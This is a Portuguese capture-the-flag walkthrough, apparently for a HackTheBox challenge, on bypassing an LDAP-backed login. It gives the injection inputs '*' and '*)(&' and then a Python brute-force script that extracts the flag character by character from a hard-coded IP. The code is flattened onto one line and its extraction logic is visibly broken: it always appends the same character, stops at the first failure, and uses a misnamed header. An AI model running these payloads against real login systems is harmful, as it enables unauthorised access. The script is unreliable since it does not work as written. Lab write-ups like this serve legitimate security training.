123/A, Miranda City Likaoli
Prikano, Dope
+0989 7876 9865 9
+(090) 8765 86543 85
Observe a dica na página de login :
2 - Informe um * (asterisco) nos campos de Usuário e Senha, e clique em Login.
3 - Uma alternativa de bypass no login seria processar a seguinte consulta no back-end :
Neste caso a consulta LDAP seria desta forma :
(&(username= *)(& )(password= *)(& ))
Informe os caracteres *)(& nos campos de Usuário e Senha, e clique em Login.
4 - No campo Search pesquise pela letra A para exibir todos os resultados.
5 - Para obtermos a Flag é necessário realizar um ataque de Brute Force. *Lembre-se de trocar o IP contido no script.
import requests import string headers = {"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"} url = "http://104.248.173.13:32327/login" chars = string.ascii_letters + string.digits + "`~!@#$%^&-_'" flag = "HTB{" password = flag + chars[0] + "*" while True: print(f"Trying: {password}") data = {"username": "Reese", "password": password} response = requests.post(url, headers=headers, data=data) if response.url!= url + "?message=Authentication%20failed": flag += chars[password.count("*")] password = flag + chars[password.count("*") + 1] + "*" else: break print(f"Flag: {flag + '}'}")
6 - Informe os dados :
Curtiu?
Compartilhe